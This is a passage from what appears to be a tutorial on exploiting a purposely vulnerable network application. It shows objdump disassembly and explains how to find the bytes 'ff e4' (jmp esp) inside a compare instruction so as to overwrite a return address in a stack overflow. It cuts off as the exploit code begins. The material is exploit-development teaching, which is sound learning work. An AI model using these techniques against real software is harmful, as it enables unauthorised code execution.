class="x" 8048b21: 8d 45 0c lea eax,[ebp+0xc]/span/span span class="code-line"span class="x" 8048b24: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048b28: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 8048b2f: 00 /span/span span class="code-line"span class="x" 8048b30: c7 44 24 08 01 00 00 mov DWORD PTR [esp+0x8],0x1/span/span span class="code-line"span class="x" 8048b37: 00 /span/span span class="code-line"span class="x" 8048b38: 8d 45 f0 lea eax,[ebp-0x10]/span/span span class="code-line"span class="x" 8048b3b: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048b3f: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048b42: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048b45: e8 d6 fb ff ff call 8048720 lt;sendto@pltgt;/span/span span class="code-line"span class="x" 8048b4a: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048b4d: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048b50: e8 1b fb ff ff call 8048670 lt;_IO_getc@pltgt;/span/span span class="code-line"span class="x" 8048b55: 89 45 f0 mov DWORD PTR [ebp-0x10],eax/span/span span class="code-line"span class="x" 8048b58: 8b 45 f0 mov eax,DWORD PTR [ebp-0x10]/span/span span class="code-line"span class="x" 8048b5b: 83 f8 ff cmp eax,0xffffffff/span/span span class="code-line"span class="x" 8048b5e: 75 b9 jne 8048b19 lt;sendfile+0x25gt;/span/span span class="code-line"span class="x" 8048b60: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048b63: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048b66: e8 e5 fa ff ff call 8048650 lt;fclose@pltgt;/span/span span class="code-line"span class="x" 8048b6b: eb 18 jmp 8048b85 lt;sendfile+0x91gt;/span/span span class="code-line"span class="x" 8048b6d: c7 04 24 dc 8d 04 08 mov DWORD PTR [esp],0x8048ddc/span/span span class="code-line"span class="x" 8048b74: e8 27 fb ff ff call 80486a0 lt;puts@pltgt;/span/span span class="code-line"span class="x" 8048b79: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="x" 8048b80: e8 3b fb ff ff call 80486c0 lt;exit@pltgt;/span/span span class="code-line"span class="x" 8048b85: c9 leave /span/span span class="code-line"span class="x" 8048b86: c3 ret /span/span span class="code-line"/span span class="code-line"span class="mh"08048b87/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"senderror/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048b87: 55 push ebp/span/span span class="code-line"span class="x" 8048b88: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048b8a: 83 ec 28 sub esp,0x28/span/span span class="code-line"span class="x" 8048b8d: c7 44 24 14 10 00 00 mov DWORD PTR [esp+0x14],0x10/span/span span class="code-line"span class="x" 8048b94: 00 /span/span span class="code-line"span class="x" 8048b95: 8d 45 0c lea eax,[ebp+0xc]/span/span span class="code-line"span class="x" 8048b98: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048b9c: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 8048ba3: 00 /span/span span class="code-line"span class="x" 8048ba4: c7 44 24 08 10 00 00 mov DWORD PTR [esp+0x8],0x10/span/span span class="code-line"span class="x" 8048bab: 00 /span/span span class="code-line"span class="x" 8048bac: c7 44 24 04 fb 8d 04 mov DWORD PTR [esp+0x4],0x8048dfb/span/span span class="code-line"span class="x" 8048bb3: 08 /span/span span class="code-line"span class="x" 8048bb4: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048bb7: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048bba: e8 61 fb ff ff call 8048720 lt;sendto@pltgt;/span/span span class="code-line"span class="x" 8048bbf: 8b 45 1c mov eax,DWORD PTR [ebp+0x1c]/span/span span class="code-line"span class="x" 8048bc2: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048bc5: e8 06 fb ff ff call 80486d0 lt;strlen@pltgt;/span/span span class="code-line"span class="x" 8048bca: c7 44 24 14 10 00 00 mov DWORD PTR [esp+0x14],0x10/span/span span class="code-line"span class="x" 8048bd1: 00 /span/span span class="code-line"span class="x" 8048bd2: 8d 55 0c lea edx,[ebp+0xc]/span/span span class="code-line"span class="x" 8048bd5: 89 54 24 10 mov DWORD PTR [esp+0x10],edx/span/span span class="code-line"span class="x" 8048bd9: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 8048be0: 00 /span/span span class="code-line"span class="x" 8048be1: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048be5: 8b 45 1c mov eax,DWORD PTR [ebp+0x1c]/span/span span class="code-line"span class="x" 8048be8: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048bec: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048bef: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048bf2: e8 29 fb ff ff call 8048720 lt;sendto@pltgt;/span/span span class="code-line"span class="x" 8048bf7: c9 leave /span/span span class="code-line"span class="x" 8048bf8: c3 ret /span/span span class="code-line"/span span class="code-line"span class="mh"08048bf9/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"sendtoken/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048bf9: 55 push ebp/span/span span class="code-line"span class="x" 8048bfa: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048bfc: 83 ec 38 sub esp,0x38/span/span span class="code-line"span class="x" 8048bff: c7 44 24 04 cd 8d 04 mov DWORD PTR [esp+0x4],0x8048dcd/span/span span class="code-line"span class="x" 8048c06: 08 /span/span span class="code-line"span class="x" 8048c07: c7 04 24 0c 8e 04 08 mov DWORD PTR [esp],0x8048e0c/span/span span class="code-line"span class="x" 8048c0e: e8 ed fa ff ff call 8048700 lt;fopen@pltgt;/span/span span class="code-line"span class="x" 8048c13: 89 45 f4 mov DWORD PTR [ebp-0xc],eax/span/span span class="code-line"span class="x" 8048c16: 83 7d f4 00 cmp DWORD PTR [ebp-0xc],0x0/span/span span class="code-line"span class="x" 8048c1a: 74 56 je 8048c72 lt;sendtoken+0x79gt;/span/span span class="code-line"span class="x" 8048c1c: eb 31 jmp 8048c4f lt;sendtoken+0x56gt;/span/span span class="code-line"span class="x" 8048c1e: c7 44 24 14 10 00 00 mov DWORD PTR [esp+0x14],0x10/span/span span class="code-line"span class="x" 8048c25: 00 /span/span span class="code-line"span class="x" 8048c26: 8d 45 0c lea eax,[ebp+0xc]/span/span span class="code-line"span class="x" 8048c29: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048c2d: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 8048c34: 00 /span/span span class="code-line"span class="x" 8048c35: c7 44 24 08 01 00 00 mov DWORD PTR [esp+0x8],0x1/span/span span class="code-line"span class="x" 8048c3c: 00 /span/span span class="code-line"span class="x" 8048c3d: 8d 45 f0 lea eax,[ebp-0x10]/span/span span class="code-line"span class="x" 8048c40: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048c44: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048c47: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048c4a: e8 d1 fa ff ff call 8048720 lt;sendto@pltgt;/span/span span class="code-line"span class="x" 8048c4f: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048c52: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048c55: e8 16 fa ff ff call 8048670 lt;_IO_getc@pltgt;/span/span span class="code-line"span class="x" 8048c5a: 89 45 f0 mov DWORD PTR [ebp-0x10],eax/span/span span class="code-line"span class="x" 8048c5d: 8b 45 f0 mov eax,DWORD PTR [ebp-0x10]/span/span span class="code-line"span class="x" 8048c60: 83 f8 ff cmp eax,0xffffffff/span/span span class="code-line"span class="x" 8048c63: 75 b9 jne 8048c1e lt;sendtoken+0x25gt;/span/span span class="code-line"span class="x" 8048c65: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048c68: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048c6b: e8 e0 f9 ff ff call 8048650 lt;fclose@pltgt;/span/span span class="code-line"span class="x" 8048c70: eb 18 jmp 8048c8a lt;sendtoken+0x91gt;/span/span span class="code-line"span class="x" 8048c72: c7 04 24 12 8e 04 08 mov DWORD PTR [esp],0x8048e12/span/span span class="code-line"span class="x" 8048c79: e8 22 fa ff ff call 80486a0 lt;puts@pltgt;/span/span span class="code-line"span class="x" 8048c7e: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="x" 8048c85: e8 36 fa ff ff call 80486c0 lt;exit@pltgt;/span/span span class="code-line"span class="x" 8048c8a: c9 leave /span/span span class="code-line"span class="x" 8048c8b: c3 ret /span/span span class="code-line"/span span class="code-line"span class="mh"08048c8c/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"checkpass/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048c8c: 55 push ebp/span/span span class="code-line"span class="x" 8048c8d: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048c8f: 81 ec 28 02 00 00 sub esp,0x228/span/span span class="code-line"span class="x" 8048c95: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048c98: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048c9b: e8 30 fa ff ff call 80486d0 lt;strlen@pltgt;/span/span span class="code-line"span class="x" 8048ca0: 83 c0 01 add eax,0x1/span/span span class="code-line"span class="x" 8048ca3: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048ca7: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048caa: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048cae: 8d 85 f0 fd ff ff lea eax,[ebp-0x210]/span/span span class="code-line"span class="x" 8048cb4: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048cb7: e8 54 fa ff ff call 8048710 lt;strncpy@pltgt;/span/span span class="code-line"span class="x" 8048cbc: 8d 85 f0 fd ff ff lea eax,[ebp-0x210]/span/span span class="code-line"span class="x" 8048cc2: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048cc5: e8 86 fa ff ff call 8048750 lt;atoi@pltgt;/span/span span class="code-line"span class="x" 8048cca: 89 45 f0 mov DWORD PTR [ebp-0x10],eax/span/span span class="code-line"span class="x" 8048ccd: 81 7d f0 ff e4 00 00 cmp DWORD PTR [ebp-0x10],0xe4ff/span/span span class="code-line"span class="x" 8048cd4: 75 09 jne 8048cdf lt;checkpass+0x53gt;/span/span span class="code-line"span class="x" 8048cd6: c7 45 f4 05 00 00 00 mov DWORD PTR [ebp-0xc],0x5/span/span span class="code-line"span class="x" 8048cdd: eb 19 jmp 8048cf8 lt;checkpass+0x6cgt;/span/span span class="code-line"span class="x" 8048cdf: c7 44 24 04 2c 8e 04 mov DWORD PTR [esp+0x4],0x8048e2c/span/span span class="code-line"span class="x" 8048ce6: 08 /span/span span class="code-line"span class="x" 8048ce7: 8d 85 f0 fd ff ff lea eax,[ebp-0x210]/span/span span class="code-line"span class="x" 8048ced: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048cf0: e8 2b f9 ff ff call 8048620 lt;strcmp@pltgt;/span/span span class="code-line"span class="x" 8048cf5: 89 45 f4 mov DWORD PTR [ebp-0xc],eax/span/span span class="code-line"span class="x" 8048cf8: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048cfb: c9 leave /span/span span class="code-line"span class="x" 8048cfc: c3 ret /span/span span class="code-line"span class="x" 8048cfd: 90 nop/span/span span class="code-line"span class="x" 8048cfe: 90 nop/span/span span class="code-line"span class="x" 8048cff: 90 nop/span/span span class="code-line"/span span class="code-line"span class="mh"08048d00/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__libc_csu_fini/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048d00: 55 push ebp/span/span span class="code-line"span class="x" 8048d01: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048d03: 5d pop ebp/span/span span class="code-line"span class="x" 8048d04: c3 ret /span/span span class="code-line"span class="x" 8048d05: 8d 74 26 00 lea esi,[esi+eiz*1+0x0]/span/span span class="code-line"span class="x" 8048d09: 8d bc 27 00 00 00 00 lea edi,[edi+eiz*1+0x0]/span/span span class="code-line"/span span class="code-line"span class="mh"08048d10/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__libc_csu_init/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048d10: 55 push ebp/span/span span class="code-line"span class="x" 8048d11: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048d13: 57 push edi/span/span span class="code-line"span class="x" 8048d14: 56 push esi/span/span span class="code-line"span class="x" 8048d15: 53 push ebx/span/span span class="code-line"span class="x" 8048d16: e8 4f 00 00 00 call 8048d6a lt;__i686.get_pc_thunk.bxgt;/span/span span class="code-line"span class="x" 8048d1b: 81 c3 e5 03 00 00 add ebx,0x3e5/span/span span class="code-line"span class="x" 8048d21: 83 ec 1c sub esp,0x1c/span/span span class="code-line"span class="x" 8048d24: e8 b7 f8 ff ff call 80485e0 lt;_initgt;/span/span span class="code-line"span class="x" 8048d29: 8d bb 04 ff ff ff lea edi,[ebx-0xfc]/span/span span class="code-line"span class="x" 8048d2f: 8d 83 00 ff ff ff lea eax,[ebx-0x100]/span/span span class="code-line"span class="x" 8048d35: 29 c7 sub edi,eax/span/span span class="code-line"span class="x" 8048d37: c1 ff 02 sar edi,0x2/span/span span class="code-line"span class="x" 8048d3a: 85 ff test edi,edi/span/span span class="code-line"span class="x" 8048d3c: 74 24 je 8048d62 lt;__libc_csu_init+0x52gt;/span/span span class="code-line"span class="x" 8048d3e: 31 f6 xor esi,esi/span/span span class="code-line"span class="x" 8048d40: 8b 45 10 mov eax,DWORD PTR [ebp+0x10]/span/span span class="code-line"span class="x" 8048d43: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048d47: 8b 45 0c mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="x" 8048d4a: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048d4e: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048d51: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048d54: ff 94 b3 00 ff ff ff call DWORD PTR [ebx+esi*4-0x100]/span/span span class="code-line"span class="x" 8048d5b: 83 c6 01 add esi,0x1/span/span span class="code-line"span class="x" 8048d5e: 39 fe cmp esi,edi/span/span span class="code-line"span class="x" 8048d60: 72 de jb 8048d40 lt;__libc_csu_init+0x30gt;/span/span span class="code-line"span class="x" 8048d62: 83 c4 1c add esp,0x1c/span/span span class="code-line"span class="x" 8048d65: 5b pop ebx/span/span span class="code-line"span class="x" 8048d66: 5e pop esi/span/span span class="code-line"span class="x" 8048d67: 5f pop edi/span/span span class="code-line"span class="x" 8048d68: 5d pop ebp/span/span span class="code-line"span class="x" 8048d69: c3 ret /span/span span class="code-line"/span span class="code-line"span class="mh"08048d6a/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__i686.get_pc_thunk.bx/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048d6a: 8b 1c 24 mov ebx,DWORD PTR [esp]/span/span span class="code-line"span class="x" 8048d6d: c3 ret /span/span span class="code-line"span class="x" 8048d6e: 90 nop/span/span span class="code-line"span class="x" 8048d6f: 90 nop/span/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".fini/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"08048d70/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"_fini/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048d70: 55 push ebp/span/span span class="code-line"span class="x" 8048d71: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048d73: 53 push ebx/span/span span class="code-line"span class="x" 8048d74: 83 ec 04 sub esp,0x4/span/span span class="code-line"span class="x" 8048d77: e8 00 00 00 00 call 8048d7c lt;_fini+0xcgt;/span/span span class="code-line"span class="x" 8048d7c: 5b pop ebx/span/span span class="code-line"span class="x" 8048d7d: 81 c3 84 03 00 00 add ebx,0x384/span/span span class="code-line"span class="x" 8048d83: 59 pop ecx/span/span span class="code-line"span class="x" 8048d84: 5b pop ebx/span/span span class="code-line"span class="x" 8048d85: c9 leave /span/span span class="code-line"span class="x" 8048d86: c3 ret/span/span span class="code-line"/code/pre/div /td/tr/table pThere aren't any codejmp esp/code's there, you can use grep to make it a little easier to go through:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /spanobjdump -d ./app-net -M intel span class="p"|/span grep jmp/span span class="code-line"span class="go" 8048616: ff 25 08 91 04 08 jmp DWORD PTR ds:0x8049108/span/span span class="code-line"span class="go" 8048620: ff 25 0c 91 04 08 jmp DWORD PTR ds:0x804910c/span/span span class="code-line"span class="go" 804862b: e9 e0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048630: ff 25 10 91 04 08 jmp DWORD PTR ds:0x8049110/span/span span class="code-line"span class="go" 804863b: e9 d0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048640: ff 25 14 91 04 08 jmp DWORD PTR ds:0x8049114/span/span span class="code-line"span class="go" 804864b: e9 c0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048650: ff 25 18 91 04 08 jmp DWORD PTR ds:0x8049118/span/span span class="code-line"span class="go" 804865b: e9 b0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048660: ff 25 1c 91 04 08 jmp DWORD PTR ds:0x804911c/span/span span class="code-line"span class="go" 804866b: e9 a0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048670: ff 25 20 91 04 08 jmp DWORD PTR ds:0x8049120/span/span span class="code-line"span class="go" 804867b: e9 90 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048680: ff 25 24 91 04 08 jmp DWORD PTR ds:0x8049124/span/span span class="code-line"span class="go" 804868b: e9 80 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048690: ff 25 28 91 04 08 jmp DWORD PTR ds:0x8049128/span/span span class="code-line"span class="go" 804869b: e9 70 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486a0: ff 25 2c 91 04 08 jmp DWORD PTR ds:0x804912c/span/span span class="code-line"span class="go" 80486ab: e9 60 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486b0: ff 25 30 91 04 08 jmp DWORD PTR ds:0x8049130/span/span span class="code-line"span class="go" 80486bb: e9 50 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486c0: ff 25 34 91 04 08 jmp DWORD PTR ds:0x8049134/span/span span class="code-line"span class="go" 80486cb: e9 40 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486d0: ff 25 38 91 04 08 jmp DWORD PTR ds:0x8049138/span/span span class="code-line"span class="go" 80486db: e9 30 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486e0: ff 25 3c 91 04 08 jmp DWORD PTR ds:0x804913c/span/span span class="code-line"span class="go" 80486eb: e9 20 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486f0: ff 25 40 91 04 08 jmp DWORD PTR ds:0x8049140/span/span span class="code-line"span class="go" 80486fb: e9 10 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048700: ff 25 44 91 04 08 jmp DWORD PTR ds:0x8049144/span/span span class="code-line"span class="go" 804870b: e9 00 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048710: ff 25 48 91 04 08 jmp DWORD PTR ds:0x8049148/span/span span class="code-line"span class="go" 804871b: e9 f0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048720: ff 25 4c 91 04 08 jmp DWORD PTR ds:0x804914c/span/span span class="code-line"span class="go" 804872b: e9 e0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048730: ff 25 50 91 04 08 jmp DWORD PTR ds:0x8049150/span/span span class="code-line"span class="go" 804873b: e9 d0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048740: ff 25 54 91 04 08 jmp DWORD PTR ds:0x8049154/span/span span class="code-line"span class="go" 804874b: e9 c0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048750: ff 25 58 91 04 08 jmp DWORD PTR ds:0x8049158/span/span span class="code-line"span class="go" 804875b: e9 b0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048760: ff 25 5c 91 04 08 jmp DWORD PTR ds:0x804915c/span/span span class="code-line"span class="go" 804876b: e9 a0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048770: ff 25 60 91 04 08 jmp DWORD PTR ds:0x8049160/span/span span class="code-line"span class="go" 804877b: e9 90 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048862: e9 79 ff ff ff jmp 80487e0 lt;register_tm_clonesgt;/span/span span class="code-line"span class="go" 8048867: e9 74 ff ff ff jmp 80487e0 lt;register_tm_clonesgt;/span/span span class="code-line"span class="go" 8048a46: eb 78 jmp 8048ac0 lt;main+0x254gt;/span/span span class="code-line"span class="go" 8048a83: eb 3b jmp 8048ac0 lt;main+0x254gt;/span/span span class="code-line"span class="go" 8048aef: e9 59 fe ff ff jmp 804894d lt;main+0xe1gt;/span/span span class="code-line"span class="go" 8048b17: eb 31 jmp 8048b4a lt;sendfile+0x56gt;/span/span span class="code-line"span class="go" 8048b6b: eb 18 jmp 8048b85 lt;sendfile+0x91gt;/span/span span class="code-line"span class="go" 8048c1c: eb 31 jmp 8048c4f lt;sendtoken+0x56gt;/span/span span class="code-line"span class="go" 8048c70: eb 18 jmp 8048c8a lt;sendtoken+0x91gt;/span/span span class="code-line"span class="go" 8048cdd: eb 19 jmp 8048cf8 lt;checkpass+0x6cgt;/span/span span class="code-line"/code/pre/div /td/tr/table pHowever, we do have another option. codeobjdump/code shows the instructions as they would be run by the processor during normal operations, you don't necessarily have to use them this way, you can instead start execution in the middle of an instruction to create a new instruction./p pThis is what we are going to try to do (this was the reason for the extra check in the application too, as you will see)./p pFirst we need to figure out what a href="https://en.wikipedia.org/wiki/Opcode" target="_blank"opcodes/a codejmp esp/code results in, we start by creating a simple assembly application with just codejmp esp/code in it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"global/spanspan class="w" /spanspan class="nv"_start/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="nl"_start:/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"jmp/spanspan class="w" /spanspan class="nb"esp/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pNow we need to assemble and link it; and then disassemble it with codeobjdump/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /spannasm -f elf32 -o jesp.o jesp.nasm /span span class="code-line"span class="gp"appuser@dev:~$ /spanld -o jesp jesp.o/span span class="code-line"span class="gp"appuser@dev:~$ /spanobjdump -d ./jesp -M intel/span span class="code-line"/span span class="code-line"span class="go"./jesp: file format elf32-i386/span/span span class="code-line"/span span class="code-line"/span span class="code-line"span class="go"Disassembly of section .text:/span/span span class="code-line"/span span class="code-line"span class="go"08048060 lt;_startgt;:/span/span span class="code-line"span class="go" 8048060: ff e4 jmp esp/span/span span class="code-line"/code/pre/div /td/tr/table pSo all we need to do is find codeff e4/code anywhere in the application code. A quick grep find us an instruction that contains this sequence:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /spanobjdump -d ./app-net -M intel span class="p"|/span grep span class="s1"#39;ff e4#39;/span/span span class="code-line"span class="go" 8048ccd: 81 7d f0 ff e4 00 00 cmp DWORD PTR [ebp-0x10],0xe4ff/span/span span class="code-line"/code/pre/div /td/tr/table pThis is the compare to code58623/code on line 104 of the source code above, code58623/code is actually codee4ff/code in hex and its stored as codeff e4/code because we are using a a href="https://en.wikipedia.org/wiki/Endianness#Little-endian" target="_blank"little endian/a system./p pThe start of this instruction is at the memory address code08048ccd/code and our codejmp esp/code is 3 bytes in, so just plus 3 to code08048ccd/code and we get code08048cd0/code. This is the address we will overwrite the return address with./p h2Exploiting The App/h2 pUsing all of the information we've retrieved so far we can build our exploit:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span 